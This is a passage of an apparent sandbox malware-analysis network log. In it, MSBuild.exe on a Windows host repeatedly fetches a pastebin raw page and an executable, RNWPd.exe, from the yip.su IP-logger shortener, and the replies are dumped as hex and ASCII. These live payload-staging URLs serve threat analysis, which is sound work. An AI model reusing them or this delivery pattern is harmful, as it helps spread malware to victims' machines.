6f 72 64 65 72 2d 72 61 64 69 Data Ascii: e>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-radi
2024-09-16 19:21:25 UTC	1369	IN	Data Raw: 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61 Data Ascii: gin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="doma
2024-09-16 19:21:25 UTC	152	IN	Data Raw: 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: osition='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:21:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49745	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:30 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:21:30 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c43384ebf7a430f-EWR
2024-09-16 19:21:30 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:21:30 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:21:30 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:21:30 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:21:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49746	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:31 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:21:32 UTC	904	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:21:31 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:21:31 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47DdMPAiOf%2FF8jtgKK0FEp1CkO1fSDD2ycLyZ1Te7dz3z%2FcHRdIuThsDP%2BNA%2F9ZTYXMWT%2B8UAfyh6nxjwraWBdLeEiVjJhWhgK1EjSHZ2PQm3a9y5MMqhZI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c4338560b92434c-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:21:32 UTC	465	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:21:32 UTC	1369	IN	Data Raw: 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f Data Ascii: t-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta pro
2024-09-16 19:21:32 UTC	1369	IN	Data Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 Data Ascii: und-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-de
2024-09-16 19:21:32 UTC	1369	IN	Data Raw: 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e Data Ascii: .userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(n
2024-09-16 19:21:32 UTC	1369	IN	Data Raw: 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 Data Ascii: ><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;bor
2024-09-16 19:21:32 UTC	1369	IN	Data Raw: 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 Data Ascii: 31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div
2024-09-16 19:21:32 UTC	160	IN	Data Raw: 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: .style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:21:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49747	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:36 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:21:37 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433876ac16c34e-EWR
2024-09-16 19:21:37 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:21:37 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:21:37 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:21:37 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:21:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49748	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:38 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:21:38 UTC	898	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:21:38 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:21:38 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0y1ohS%2FFJgg4m098TfIgtWFsDEebq6hdi63Ugt3ElDjM9QlJyC6ojG7ezlaqZW3oxta6oX5HEv72gPa8wkTB4ziecLppwzDf3l0vgEP8Mq1gZsHLiNdds%2Fc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c43387efd1a0cbc-EWR alt-svc: h3=":443"; ma=86400
